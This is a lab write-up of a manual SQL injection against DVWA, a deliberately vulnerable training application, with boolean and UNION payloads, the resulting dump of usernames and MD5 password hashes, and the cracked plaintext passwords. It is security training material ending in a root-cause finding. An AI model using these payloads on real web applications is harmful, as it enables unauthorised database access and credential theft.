DVWA SQL Injection — Manual Attack Results
Target: http://10.0.0.2/dvwa/vulnerabilities/sqli/
Security Level: Low
Date: 2026-04-02
================================================================================

── Phase 1: Boolean Injection (Dump All Records) ────────────────────────────

Payload entered in User ID field:
  1' OR '1'='1

SQL query sent to database:
  SELECT first_name, last_name FROM users WHERE user_id = '1' OR '1'='1'

Result — all 5 employee records returned:

  ID: 1' OR '1'='1
  First name: admin
  Surname: admin

  ID: 1' OR '1'='1
  First name: Gordon
  Surname: Brown

  ID: 1' OR '1'='1
  First name: Hack
  Surname: Me

  ID: 1' OR '1'='1
  First name: Pablo
  Surname: Picasso

  ID: 1' OR '1'='1
  First name: Bob
  Surname: Smith

Finding: Application returned all records instead of one.
Confirms absence of input sanitisation — the injected OR clause was executed.

================================================================================

── Phase 2: UNION Injection (Credential Exfiltration) ───────────────────────

Payload entered in User ID field:
  1' UNION SELECT user, password FROM users #

SQL query sent to database:
  SELECT first_name, last_name FROM users WHERE user_id = '1'
  UNION SELECT user, password FROM users #'

Result — all usernames and MD5 password hashes exfiltrated:

  ID: 1' UNION SELECT user, password FROM users #
  First name: admin
  Surname: 5f4dcc3b5aa765d61d8327deb882cf99

  ID: 1' UNION SELECT user, password FROM users #
  First name: gordonb
  Surname: e99a18c428cb38d5f260853678922e03

  ID: 1' UNION SELECT user, password FROM users #
  First name: 1337
  Surname: 8d3533d75ae2c3966d7e0d4fcc69216b

  ID: 1' UNION SELECT user, password FROM users #
  First name: pablo
  Surname: 0d107d09f5bbe40cade3de5c71e9e9b7

  ID: 1' UNION SELECT user, password FROM users #
  First name: smithy
  Surname: 5f4dcc3b5aa765d61d8327deb882cf99

================================================================================

── Phase 3: Hash Cracking (CrackStation rainbow table) ──────────────────────

  5f4dcc3b5aa765d61d8327deb882cf99  -->  password   (admin, smithy)
  e99a18c428cb38d5f260853678922e03  -->  abc123     (gordonb)
  8d3533d75ae2c3966d7e0d4fcc69216b  -->  charley    (1337)
  0d107d09f5bbe40cade3de5c71e9e9b7  -->  letmein    (pablo)

================================================================================
Vulnerability: SQL Injection (CWE-89, OWASP A03:2021)
Root cause:    Direct string concatenation of user input into SQL query
               with no parameterisation or input validation
Impact:        Full credential database exfiltrated in two requests
